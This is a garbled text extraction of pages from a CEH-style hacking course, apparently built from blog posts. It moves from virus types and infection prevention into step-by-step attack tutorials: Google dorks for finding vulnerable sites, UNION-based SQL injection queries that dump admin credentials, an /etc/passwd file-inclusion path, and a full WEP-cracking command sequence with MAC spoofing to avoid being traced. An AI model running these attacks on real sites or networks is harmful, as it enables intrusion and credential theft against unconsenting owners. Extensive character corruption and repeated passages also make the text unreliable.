polymorphic code the virus has to have a polymorphic en%ine /also called mutatin% en%ine or
mutation en%ine0" 1olymorphic code is a code that mutates while keepin% the ori%inal al%orithm intact"
Meta"or#$ic Virus!etamorphic viruses rewrite themselves completely each time they are to infect new executables"
!etamorphic code is a code that can repro%ram itself by translatin% its own code into a temporary
representation and then back to normal code a%ain"
2or example W345$imile consisted of over 67888 lines of assembly code 98: of it is part of the
metamorphic en%ine"
%ile E&tesio Virus2ile extension viruses chan%e the extensions of files" "T*T is safe as it indicates a pure text file" With
extensions turned off if someone sends you a file named +,D"T*T"V+$ you will only see +,D"T*T"'f
you;ve for%otten that extensions are actually turned off you mi%ht think this is a text file and open
it" This is really an executable Visual +asic $cript virus file and could do
serious dama%e "
Countermeasure is to turn off <=ide file extensions> in Windows"
copyright © 2016 EAPL 38
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 39/67
=ow to stop virus or tro?an attacks
If you want to know that your system is either infected by viruses and tro'ans then these
are certain techni)ues to know that$
3. Your !omputer might be running slow usual than normal.
>. Some programs might open without your permission.
@. System start up takes too much time to start.
2. 0arious Arror messages appear on Screen when you open something or without
opening also.
<. System registry has been disabled or folder options is missing.
1. #he most important antivirus shows messages of detecting viruses time to time.
B. hile scanning your system from any antivirus or anti spyware tool its showing
viruses and you noticed that viruses are not deleting.
and much more…
;ave you ever think about the reason why your system is got infected. hat has
infected your system and if its done by any of your friend ;ow he has done it. Surely o6
or in some cases you have tried to find the answer but you are not able to get proper
answer. 7ut story is different here 6 I will tell all the ways ;ow your system can be Cet
infected and ;ow you can protect it if its already infected ;ow you can resolve the
problem. So here are few things ;ow your System got Infected 6 some might be knowing
this but by some reason they have ignored them.
.ow a Syste/ is got In'ected !ecause toNegigence?
0+ 1sing Cracked Versions o' so'tware s2eciay security ones ike anti3irus4
anti5s2yware etc+
hy I have said this is the first and ma'or cause of infection because of the following
simple reason that -ll hackers know that general internet user public always searches for
cracked versions of software4s and wishes to use them for free and ;acker take benefit
of them. You all now be thinking how it help hackers. e know that almost all antivirus
show each and every keygen as virus or some tro'an depending upon its type. ow if we
all know that then how come hackers will forget this fact so what they do they attachestro'ans and viruses to these files and at the time hen your antivirus shows it as virus
copyright © 2016 EAPL 39
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 40/67
you ignores the alert and keep the keygen means tro'an running.
*#A$ -nd Cuys an important note for you all6 If your antivirus doesn4t show any keygen
or crack as a virus then don4t ever think that its not a virus but its a most dangerous
thing. hy dangerous because now ;acker has used some more brain to fool you that is
he has made the virus undetectable simply edit the hex code of original virus. So what is
the moral of story Please don4t use cracked versions.
ow you all be thinking that if we don4t use the cracked versions then how we will able
to get full versions of the software4s. &on4t worry when I am there no fear drink beer and
en'oy everything for free. Its solution will be in solutions step 'ust read article.
6+ Pen dri3e or 1S" dri3e &
#he biggest cause of infection of your system is usb drives and external hard disks.
ow how a virus enters into your system using (S7 drives. You have connected your
(S7 drive to your friends computer and by chance 8sorry its for sure i.e 3==D9 your
friends system is infected by virus or #ro'ans and its the property of 0irus that it
replicates itself using memory. So when you connect your (S7 to your friends computer
your (S7 is now infected by virus and now when you connect this (S7 to your P! using
the property of your indows that it searches the files in ewly connected device and
autorun the device and for doing this it loads the index of your (S74s file system into
Eemory and now if (S7 has virus its the property of virus its replicates itself using
system memory. ow if you are using good antivirus 6 your antivirus will pop warning
and alert messages and some times you ignores them means your system is also
infected. "or (S7 drive virus solution keep reading article.
7+ (ownoading things 'ro/ 1nknown Sites&
Eost of the users searches for thing over the internet and where ever they find their
desired result means file that they want they start downloading that from that site only.
ow how it affects your system suppose you want to download any wallpaper say Fatrina
Faif. ow hackers know the fact that Fatrina has a huge fan following and user will
surely going to download it. #hen what they do they simply bind their malicious codes
with some of files and when users download it his system is infected and he can never
imagine that the virus has come from wallpaper that he has downloaded from unknown
site. "or its solution read on article.
8+ The /ost i/2ortant one "eco/ing a .acker ike %e 9ROF) !ut its truth:+
hy I have mentioned this you might be clear from the above discussion. Eost of the
internet users always curious to know ways how can i hack my friends email account or
his system for these they download all type of shit from the internet and believe me
??.?D of this shit contains viruses and #ro'ans that sends your information to the
providers. ow I don4t say that stop hacking but try to follow some basic steps to learn
hacking and first of all you must know how to protect yourself from such type of fake
software4s. "or its solution read on article.
copyright © 2016 EAPL 40
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 41/67
ow after discussing the things ;ow you system is got infected by your simple
negligence. Its time You should Fnow ;ow to fix them and protect your system from all
types of viruses and tro'ans.
.OW TO STOP VIR1S OR TRO#ANS ??
0+ 1sing Good Anti3irus&#here is a nice misconception between the internet users that full antivirus provides
better security. Ya its 3==D truth but full antiviruses paid ones not the cracked ones.
#here are several other solutions to them that you will get for absolutely "ree and I
guarantee that it will protect your system 3==D 'ust doing some little configurations.
"est Free Anti3irus & -vira Personal -ntivirus i.e -ntivir.
You can download avira for free from $
http$//www.filehippo.com/downloadGantivir/
ow after downloading the antivirus what you have to do to make it as good as paid
antiviruses.
a. Install the antivirus and update it. ote updating antivirus regularly is compulsory.
&on4t worry its not your work it will update itself automatically whenever update is
available.
b. -fter Installing at the right hand top corner you will see a H!*"IC(-#I* button.
Just click on it now a new window will pop up.
c. ow #here at left hand top you will see a click box in front of Axpert is written . !lick
on that now you will see several things in it. ow do the following setting one by one.
3. !lick on HScanner click on all files and set the HScanner Priority to high and click on
apply.
>. !lick on HCuard and click on all files and click on HScan while reading and writing and
then click apply.
@. !lick on HCeneral ow click on select all and click on apply. In general tab only go to
EI section and click on advanced process protection and then click on apply.
2. -fter doing that restart your P!.
ow you have made your free antivirus an e)uivalent to the paid one..
"est Free Anti5S2yware& Spyware #erminator with crawler eb security toolbar.
&ownload It for free $
copyright © 2016 EAPL 41
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 42/67
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 43/67
#he solution of this problem is already provided eb browser Security toolbar will help
you in surfing only secured and genuine websites and if you want to visit and download
0irus #otal will help you to identify the file whether its infected or not.
*+ Now 'or .acker ike /e i+e %ethod to useor test .ack toos+
hy I have mentioned this is simply because ;ackers always take benefit of these
noobish tricks that they attach viruses with files and name them as hack tools . So avoid
them if you are too curious like me. #hen there are several ways to ;andle it.
3. (se &eep "ree+e on ! drive$ "or testing ;ack tools always use deep free+e as after
the next restart your system will be at same position as it was previous.
>. Install 0irtual 7ox and over virtual box install another indows and test all hack tools
using virtual windows. #his will protect your system from being infected. -lso It will give
you more knowledge about handling the viruses and other situations like when
something wrong is done what i have to do.
@. !reate two to three fake email I&4s and use them for testing Feyloggers and other
fake email hacking software4s.
"or Some more security #ips you can also read my previous article$
HACKIN/ WEB ,ER:ER
Hello friends , welcome back to hacking class, today i will e"plain all the methods that are
being used to hack a website or websites database. %his is the first part of the class @How to
hack a website or ebsites databaseA and in this i will introduce all website hacking
methods. %oday # will give you the overview and in later classes we will discuss them one by
one with practical e"amples. o guys get ready for first part of Hacking websites class.
Don*t worry i will also tell you how to protect your websites from these attacks and other
methods like hardening of C& and hardening of web servers and key knowledge about
H)1D rights that what thing should be give what rights
ote : This !ost is only for "#ucational $ur!oseonly%
copyright © 2016 EAPL 43
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 44/67
&hat are 'asic things you shoul# kno( 'efore
(e'site hacking)'irst of all everything is optional as i will start from very scratch. But you need atleast basic
knowledge of following things..
;. Basics of H%)&, C&, PHP.
>. Basic knowledge of avascript.
2. Basic knowledge of servers that how servers work.
E. !nd most important e"perti$e in removing traces otherwise u have to suffer conse8uences.
Now 'irst two things you can learn from a very famous website for basics of ebsite design
with basics of H%)&,C&,PHP and (avascript.
http/FFwww.w2schools.comF
!nd for the fourth point that you should be e"pert in removing traces . 'or this you can refer
to first G hacking classes and specially read these two
;. Hiding ourself from being traced.
copyright © 2016 EAPL 44
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 45/67
>. 7emoving your %races
!s we know traces are very important. Please don*t ignore them otherwise you can be in big
trouble for simply doing nothing. so please take care of this step.
M"TH*+S *F HAC,-. &"BS-T":
;. C& #N6%#1N
>. 71 #%6 7#P%#N<
2. 76)1%6 '#&6 #N&0#1N
E. &1!& '#&6 #N&0#1N
G. DD1 !%%!5
4. 6IP&1#%#N< 0&N67!B#&#%.
/% S0L -1"CT-*
'irst of all what is C& in(ectionJ C& in(ection is a type of security e"ploit or loophole in
which a attacker @in(ectsA C& code through a web form or manipulate the 07&*s based on
C& parameters. #t e"ploits web applications that use client supplied C& 8ueries.
%he primary form of C& in(ection consists of direct insertion of code into user-input variables that
are concatenated with C& commands and e"ecuted. ! less direct attack in(ects malicious code into
strings that are destined for storage in a table or as metadata. hen the stored strings are
subse8uently concatenated into a dynamic C& command, the malicious code is e"ecuted.
&hat are 'asic things you shoul# kno( 'efore (e'site hacking)
'irst of all everything is optional as i will start from very scratch. But you need atleast basic
knowledge of following things..
;. Basics of H%)&, C&, PHP.
>. Basic knowledge of avascript.
2. Basic knowledge of servers that how servers work.
copyright © 2016 EAPL 45
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 46/67
E. !nd most important e"perti$e in removing traces otherwise u have to suffer conse8uences.
Now 'irst two things you can learn from a very famous website for basics of ebsite design
with basics of H%)&,C&,PHP and (avascript.
http/FFwww.w2schools.comF
!nd for the fourth point that you should be e"pert in removing traces . 'or this you can refer
to first G hacking classes and specially read these two
;. Hiding ourself from being traced.
>. 7emoving your %races
!s we know traces are very important. Please don*t ignore them otherwise you can be
in big trouble for simply doing nothing. so please take care of this step.
M"TH*+S *F HAC,-. &"BS-T":
;. C& #N6%#1N
>. 71 #%6 7#P%#N<2. 76)1%6 '#&6 #N&0#1N
E. &1!& '#&6 #N&0#1N
G. DD1 !%%!5
4. 6IP&1#%#N< 0&N67!B#&#%.
/% S0L -1"CT-* 'irst of all what is C& in(ectionJ C& in(ection is a type of security e"ploit or
loophole in which a attacker @in(ectsA C& code through a web form or manipulatethe 07&*s based on C& parameters. #t e"ploits web applications that use client
supplied C& 8ueries.
%he primary form of C& in(ection consists of direct insertion of code into user-input variables that
are concatenated with C& commands and e"ecuted. ! less direct attack in(ects malicious code into
strings that are destined for storage in a table or as metadata. hen the stored strings are
subse8uently concatenated into a dynamic C& command, the malicious code is e"ecuted.
2% C3*SS S-T" SC3-$T-. ross site scripting 9I: occurs when a user inputs malicious data into a website,
which causes the application to do something it wasn*t intended to do. I attacks
copyright © 2016 EAPL 46
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 47/67
are very popular and some of the biggest websites have been affected by them
including the 'B#, NN, 6bay, !pple, )icrosft, and !1&.
ome website features commonly vulnerable to I attacks are/
K earch 6ngines
K &ogin 'ormsK omment 'ields
ross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side
security mechanisms normally imposed on web content by modern browsers. By finding ways of
in(ecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive
page content, session cookies, and a variety of other information maintained by the browser on behalf
of the user. ross-site scripting attacks are therefore a special case of code in(ection.
# will e"plain this in detail in later hacking classes. o keep reading..
4% 3"M*T" F-L" -CL5S-*7emote file inclusion is the most often found vulnerability on the website.
7emote 'ile #nclusion 97'#: occurs when a remote file, usually a shell 9a graphical interface for
browsing remote files and running your own code on a server:, is included into a website which allows
the hacker to e"ecute server side commands as the current logged on user, and have access to files on
the server. ith this power the hacker can continue on to use local
e"ploits to escalate his privileges and take over the whole system.
7'# can lead to following serious things on website /
• ode e"ecution on the web server
• ode e"ecution on the client-side such as avascript which can lead to other attacks such as
cross site scripting 9I:.
• Denial of ervice 9Do:
• Data %heftF)anipulation
6% L*CAL F-L" -CL5S-* &ocal 'ile #nclusion 9&'#: is when you have the ability to browse through the server by means of
directory transversal. 1ne of the most common uses of &'# is to discover the FetcFpasswd file. %his file
contains the user information of a &inu" system. Hackers find sites vulnerable to &'# the same way #
discussed for 7'#*s.
&et*s say a hacker found a vulnerable site, www.target-site.comFinde".phpJpLabout, by means of
directory transversal he would try to browse to the FetcFpasswd file/
www.target-site.comFinde".phpJpL ..F..F..F..F..F..F..FetcFpasswd
# will e"plain it in detail with practical websites e"ample in latter se8uential classes on ebsite
Hacking.
7% ++*S ATTAC,
copyright © 2016 EAPL 47
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 48/67
imply called distributed denial of service attack. ! #enial8of8ser9ice attack 9+oS attack :
or#istri'ute# #enial8of8ser9ice attack 9++oS attack : is an attempt to make a computer
resource unavailable to its intended users. !lthough the means to carry out, motives for, and targets of
a Do attack may vary, it generally consists of the concerted efforts of a person or people to prevent an
#nternet site or service from functioning efficiently or at all, temporarily or indefinitely. #n DD1
attack we consumes the bandwidth and resources of any website and make it unavailable to its
legitimate users.
'or more detailed hack on DD1 visit/
%";$L*T-. V5L"3AB-L-T< #ts not a new category it comprises of above five categories but i mentioned it separately because there
are several e"ploits which cannot be covered in the above five categories. o i will e"plain them
individually with e"amples. %he basic idea behind this is that find the vulnerability in the website and
e"ploit it to get the admin or moderator privileges so that you can manipulate the things easily.
S'( IN)ECTION
Hello friends in my previous class of How to hack websites, there i e"plained the
various topics that we will cover in hacking classes. &et*s today start with the first
topic Hacking ebsites using C& in(ection tutorial. #f you have missed the previous
hacking class don*t worry read it here.
o guys let*s start our tutorial of Hacking ebsites using C& in(ection techni8ue.
'irst of all, i will provide you the brief introduction about C& in(ection.
ote: This article is for "#ucational $ur!oses only% $lease +on=t misuse
it% -soft#l an# me are not res!onsi'le of any misuse #one 'y you%
)yC& database is very common database system these days that websites use and
you will surprise with the fact that its the most vulnerable database system ever.#ts
copyright © 2016 EAPL 48
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 49/67
has unlimited loopholes and fi"ing them is a very tedious task. Here we will discuss
how to e"ploit those vulnerabilities manually without any tool.
Hacking ebsites using C& #n(ection
ST"$S T* HAC, &"BS-T"S 5S-. S0L
-1"CT-*
/% Fin#ing the target an# 9ulnera'le (e'sites
'irst of all we must find out our target website. # have collected a lot of dorks i.e the
vulnerability points of the websites. ome <oogle earches can be awesomely utili$ed
to find out vulnerable ebsites.. Below is e"ample of some 8ueries..
"xam!les: *!en the .oogle an# co!y !aste these >ueries?
inurl/inde".phpJidL
inurl/trainers.phpJidL
copyright © 2016 EAPL 49
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 50/67
inurl/buy.phpJcategoryL
inurl/article.phpJ#DL
inurl/playMold.phpJidL
inurl/declarationMmore.phpJdeclMidL
inurl/pageidL
inurl/games.phpJidL
inurl/page.phpJfileL
inurl/newsDetail.phpJidL
inurl/gallery.phpJidL
earch google for more google dorks to hack websites. # cannot put them on my
website as they are too critical to discuss. e can discuss them in comments of this
posts so keep posting and reading there.
2% Checking for Vulnera'ility on the (e'site
uppose we have website like this/-
copyright © 2016 EAPL 50
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 51/67
hp/FFwww.site.comFproducts.phpJidLO
%o test this 07&, we add a 8uote to it
hp/FFwww.site.comFproducts.phpJidLO*
1n e"ecuting it, if we get an error like this/ @ou have an error in your C& synta"Qcheck the manual that corresponds to your )yC& server version for the right
etcA1r something like that, that means the target website is vulnerable to s8l
in(ection and you can hack it.
4@% Fin# the num'er of columns
%o find number of columns we use statement 17D67 B 9tells database how to
order the result: so how to use itJ ell (ust incrementing the number until we get an
error.
hp/FFwww.site.comFproducts.phpJidLG order by ;F RS no error
hp/FFwww.site.comFproducts.phpJidLG order by >F RS no error
hp/FFwww.site.comFproducts.phpJidLG order by 2F RS no error
hp/FFwww.site.comFproducts.phpJidLG order by EF RS 6rror 9we get message like
this 0nknown column E* in order clause* or something like that:
copyright © 2016 EAPL 51
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 52/67
that means that the it has 2 columns, cause we got an error on E.
6@% Check for 5-* function
ith union we can select more data in one s8l statement.
o we have
hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2F
9we already found that number of columns are 2 in section >:. :
if we see some numbers on screen, i.e ; or > or 2 then the 0N#1N works .
7@% Check for MyS0L 9ersion
hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2F
N1%6/ if F not working or you get some error, then try T
it*s a comment and it*s important for our 8uery to work properly.
&et say that we have number > on the screen, now to check for version
we replace the number > with UUversion or version9: and get someting like E.;.22-
log or G.=.EG or similar.
it should look like this
copyright © 2016 EAPL 52
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 53/67
hp/FFwww.site.comFproducts.phpJidLG union all select ;,UUversion,2F
#f you get an error @union V illegal mi" of collations 9#)P&##% V 167#B&6: A
# didn*t see any paper covering this problem, so i must write it .
hat we need is convert9: function
i.e.
hp/FFwww.site.comFproducts.phpJidLG union all select ;,convert9UUversion
using latin;:,2F
or with he"9: and unhe"9:
i.e.
hp/FFwww.site.comFproducts.phpJidLG union all select
;,unhe"9he"9UUversion::,2F
and you will get )yC& version .
@% .etting ta'le an# column name
ell if the )yC& version is less than G 9i.e E.;.22, E.;.;>: WT later i will describe
for )yC& greater than G version.
we must guess table and column name in most cases.
common table names are/ userFs, adminFs, memberFs
common column names are/ username, user, usr, userMname, password, pass,
passwd, pwd etci.e would be
copyright © 2016 EAPL 53
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 54/67
hp/FFwww.site.comFproducts.phpJidLG union all select ;,>,2 from adminF
9we see number > on the screen like before, and that*s good :
e know that table admin e"ists
Now to check column names.
hp/FFwww.site.comFproducts.phpJidLG union all select ;,username,2 from
adminF
9if you get an error, then try the other column name:
we get username displayed on screen, e"ample would be admin, or superadmin etc
now to check if column password e"ists
hp/FFwww.site.comFproducts.phpJidLG union all select ;,password,2 from
adminF
9if you get an error, then try the other column name:
we seen password on the screen in hash or plain-te"t, it depends of how the database
is set up
i.e mdG hash, mys8l hash, sha;
Now we must complete 8uery to look nice'or that we can use concat9: function 9it (oins strings:
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select
;,concat9username,="2a,password:,2 from adminF
Note that i put ="2a, its he" value for / 9so ="2a is he" value for colon:
copyright © 2016 EAPL 54
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 55/67
9there is another way for that, char9G3:, ascii value for / :
hp/FFwww.site.comFproducts.phpJidLG union all select
;,concat9username,char9G3:,password:,2 from adminF
Now we get displayed username/password on screen, i.e admin/admin or
admin/somehash
hen you have this, you can login like admin or some superuser.
#f can*t guess the right table name, you can always try mys8l.user 9default:
#t has user password columns, so e"ample would be
hp/FFwww.site.comFproducts.phpJidLG union all select
;,concat9user,="2a,password:,2 from mys8l.userF
@% MyS0L 7
&ike i said before i*m gonna e"plain how to get table and column names
in )yC& greater than G.
'or this we need informationMschema. #t holds all tables and columns in database.
%o get tables we use tableMname and informationMschema.tables.
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from
informationMschema.tablesF
copyright © 2016 EAPL 55
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 56/67
Here we replace the our number > with tableMname to get the first table from
informationMschema.tables
displayed on the screen. Now we must add &#)#% to the end of 8uery to list out all
tables.
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from
informationMschema.tables limit =,;F
note that i put =,; 9get ; result starting from the =th:
now to view the second table, we change limit =,; to limit ;,;
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 from
informationMschema.tables limit ;,;F
the second table is displayed.
for third table we put limit >,;
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select ;,tableMname,2 frominformationMschema.tables limit >,;F
5eep incrementing until you get some useful like dbMadmin, pollMuser, auth,
authMuser etc
%o get the column names the method is the same.
copyright © 2016 EAPL 56
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 57/67
Here we use columnMname and informationMschema.columns
the method is same as above so e"ample would be
hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from
informationMschema.columns limit =,;F
%he first column is diplayed.
%he second one 9we change limit =,; to limit ;,;:
ie.
hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from
informationMschema.columns limit ;,;F
%he second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc
#f you wanna display column names for specific table use this 8uery. 9where clause:
&et*s say that we found table users.
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select ;,columnMname,2 from
informationMschema.columns where tableMnameL*users*F
Now we get displayed column name in table users. ust using &#)#% we can list all
columns in table users.
Note that this won*t work if the magic 8uotes is 1N.&et*s say that we found colums user, pass and email.
copyright © 2016 EAPL 57
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 58/67
Now to complete 8uery to put them all together.
'or that we use concat9: , i decribe it earlier.
i.e
hp/FFwww.site.comFproducts.phpJidLG union all select
;,concat9user,="2a,pass,="2a,email: from usersF
hat we get here is user/pass/email from table users.
6"ample/ admin/hash/whateverUblabla.com
But the passwords are in hash format so we need to crack the hash. Note X=Y of hash
are crackable but ;=Y are still there which are unable to crack. o don*t feel bad if
some hash doesn*t crack.
For Cracking the M+7 hash 9alues you can usethis :
;: heck the net whether this hash is cracked before/
Download/
http/FFwww.mdGdecrypter.co.uk
>: rack the password with the help of a site/
Download//
copyright © 2016 EAPL 58
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 59/67
http/FFwww.milw=rm.comFcrackerFinsert.php
or
http/FFpasscracking.comFinde".php
2: 0se a )DG cracking software/
Download/
http/FFrapidshare.comFfilesF;24X4OX4'M>.;=M>b.rar
$ass(or# *(lsest
ST"$S T* HAC, &-F- *3 &-3"L"SS $ASS&*3+
;. <et the Backtrack-&inu" D. Backtrack &inu" &ive D9best &inu" available for hackers
with more than >=== hacking tools inbuilt:.
Download Backtrack &inu" &ive D from here/  H676
2% SCA T* ."T TH" V-CT-M
<et the victim to attack that is whose password you want to hack or crack.
Now 6nter the Backtrack &inu" D into your D drive and start it. 1nce its started click on
the black bo" in the lower left corner to load up a ,*S*L"D . Now you should start your
ifi card. %o do it so type
airmon-ng
ou will see the name of your wireless card. 9mine is named @ath=A: 'rom here on out,replace @ath=A with the name of your card. Now type
airmon-ng stop ath=
then type/
copyright © 2016 EAPL 59
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 60/67
ifconfig wifi= down
then type/
macchanger Rmac ==/;;/>>/22/EE/GG wifi=
then type/
airmon-ng start wifi=
%he above steps i have e"plained is to spoof yourself from being traced. #n above step
we are spoofing our )! address, this will keep us undiscovered.
Now type/
airodump-ng ath=
!ll above steps in one screen shot/
copyright © 2016 EAPL 60
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 61/67
Now you will see a list of wireless networks in the 5onsole. ome will have a better
signal than others and its always a good idea to pick one that has a best signalstrength otherwise it will take huge time to crack or hack the password or you may
not be able to crack it at all.
1nce you see the networks list, now select the network you want to hack. %o free$e
the airodump screen H1&D the N%7& key and Press .
Now you will see something like this/
copyright © 2016 EAPL 61
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 62/67
4% S"L"CT-. "T&*3, F*3 HAC,-.Now find the network that you want to crack and )!56 076 that it says theencryption for that network is 6P. #f it says P! or any variation of P! then
move onyou can still crack P! with backtrack and some other tools but it is a
whole other ball game and you need to master 6P first.
copyright © 2016 EAPL 62
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 63/67
1nce you*ve decided on a network, take note of its channel number and bssid. %he
bssid will look something like this T
==/>2/4X/bb/>d/of
%he hannel number will be under a heading that says @HA. !s shown in this figure/
copyright © 2016 EAPL 63
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 64/67
Now in the same 51N1&6 window type/
airodump-ng -c (channel) -w (file name) –bssid (bssid) ath0
%he file name can be whatever you want. %his file is the place where airodump is
going to store the packets of info that you receive to later crack. ou don*t even put in
an e"tension(ust pick a random word that you will remember. # usually make mine
@BenA because # can always remember it. #ts simply because i love
ben;=.hhahahahaha /D
Note/ #f you want to crack more than one network in the same session, you must have
different file names for each one or it won*t work. # usually name them as ben;, ben>
etc.
1nce you typed in that last command, the screen of airodump will change and start
to show your computer gathering packets. ou will also see a heading marked @#A
with a number underneath it. %his stands for @#nitiali$ation ectorA but in general
terms all this means is @packets of info that contain characters of the password.A
1nce you gain a minimum of G,=== of these #*s, you can try to crack the password.
#*ve cracked some right at G,=== and others have taken over 4=,===. #t (ust depends
on how long and difficult they made the password. )ore difficult is password more
packets you will need to crack it.
6% Cracking the &"$ !ass(or#
copyright © 2016 EAPL 64
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 65/67
Now leave this 5onsole window up and running and open up a >nd 5onsole window.
#n this window type/
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44: ath0
%his will send some commands to the router that basically it is to associate your
computer even though you are not officially connected with the password. #f this
command is successful, you should see about E lines of te"t print out with the last
one saying something similar to @!ssociation uccessful /-:A
#f this happens, then good+ ou are almost there.
Now type/
aireplay-ng -2 -b 9bssid: -h ==/;;/>>/22/EE/GG ath=
%his will generate a bunch of te"t and then you will see a line where your computer is
gathering a bunch of packets and waiting on !7P and !5. Don*t worry about what
these mean(ust know that these are your meal tickets. Now you (ust sit and wait.
1nce your computer finally gathers an !7P re8uest, it will send it back to the router
and begin to generate hundreds of !7P and !5 per second. ometimes this startsto happen within secondssometimes you have to wait up to a few minutes. ust be
patient. hen it finally does happen, switch back to your first 5onsole window and
you should see the number underneath the # starting to rise rapidly. %his is great+ #t
means you are almost finished+ hen this number reaches !% &6!% G,=== then
you can start your password crack. #t will probably take more than this but # always
start my password cracking at G,=== (ust in case they have a really weak password.
Now you need to open up a 2rd and final 5onsole window. %his will be where we
actually crack the password.Now type/
aircrack-ng -b 9bssid: 9filename:-=;.cap
7emember the file name you made up earlierJ )ine was @BenA. Don*t put a space in
between it and -=;.cap here. %ype it as you see it. o for me, # would type wepkey-
=;.cap
1nce you have done this you will see aircrack fire up and begin to crack the
password. typically you have to wait for more like ;=,=== to >=,=== #*s before it will
crack. #f this is the case, aircrack will test what you*ve got so far and then it will say
something like @not enough #*s. 7etry at ;=,===.A
copyright © 2016 EAPL 65
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 66/67
D1N*% D1 !N%H#N<+ #t will stay runningit is (ust letting you know that it is on
pause until more #*s are gathered. 1nce you pass the ;=,=== mark it will
automatically fire up again and try to crack it. #f this fails it will say @not enough #*s.
7etry at ;G,===.A and so on until it finally gets it.
#f you do everything correctly up to this point, before too long you will have thepassword+ now if the password looks goofy, dont worry, it will still work. some
passwords are saved in !## format, in which case, aircrack will show you e"actly
what characters they typed in for their password. ometimes, though, the password
is saved in H6I format in which case the computer will show you the H6I
encryption of the password. #t doesn*t matter either way, because you can type in
either one and it will connect you to the network.
%ake note, though, that the password will always be displayed in aircrack with a
colon after every > characters. o for instance if the password was @secretA, it would
be displayed as/
se:cr:et
%his would obviously be the !## format. #f it was a H6I encrypted password that
was something like @='5XE>O'A then it would still display as/
0!:"#:$4:2%:&!
copyright © 2016 EAPL 66
8/17/2019 CEH Course Material
http://slidepdf.com/reader/full/ceh-course-material 67/67
ust omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network and type in the password without the colons
and presto+ ou are in+
#t may seem like a lot to deal with if you have never done it, but after a few successful
attempts, you will get very 8uick with it. #f # am near a 6P encrypted router with a
good signal, # can often crack the password in (ust a couple of minutes.
# am not responsible for what you do with this information. !ny maliciousFillegal
activity that you do, falls completely on you becausetechnicallythis is (ust for you
to test the security of your own network.
# hope you all liked it. #f you have any 8ueries then ask me.
top related